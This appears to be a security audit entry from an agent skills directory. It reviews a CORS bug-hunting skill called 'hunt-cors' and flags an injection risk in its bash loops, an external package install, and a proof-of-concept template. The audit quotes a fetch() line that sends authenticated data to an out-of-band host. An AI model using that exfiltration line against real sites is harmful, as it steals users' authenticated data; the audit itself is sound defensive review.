The Agent Skills Directory

[COMMAND_EXECUTION]: The skill provides bash script examples that iterate through local text files (e.g., api-endpoints.txt) and interpolate their contents directly into command-line arguments for curl and httpx. This pattern introduces an indirect injection vulnerability if the input files contain malicious shell characters.\n
Ingestion points: recon/$TARGET/api-endpoints.txt, recon/$TARGET/live-hosts.txt\n
Boundary markers: Absent.\n
Capability inventory: curl, httpx, corsy, nuclei\n
Sanitization: Absent. The provided scripts do not validate or escape input from reconnaissance files.\n- [EXTERNAL_DOWNLOADS]: The instructions guide the user to install a third-party security auditing package from a public registry.\n
Evidence: pip3 install corsy\n
Note: While corsy is a legitimate utility, this represents an external dependency.\n- [DATA_EXFILTRATION]: The skill provides Proof-of-Concept templates for exfiltrating sensitive authenticated data to an Out-Of-Band (OOB) service.\n
Evidence: fetch("https://OOB-ID.oastify.com/?d="+encodeURIComponent(d));\n
Context: These templates are intended to demonstrate the security impact of a misconfiguration using well-known testing infrastructure.

hunt-cors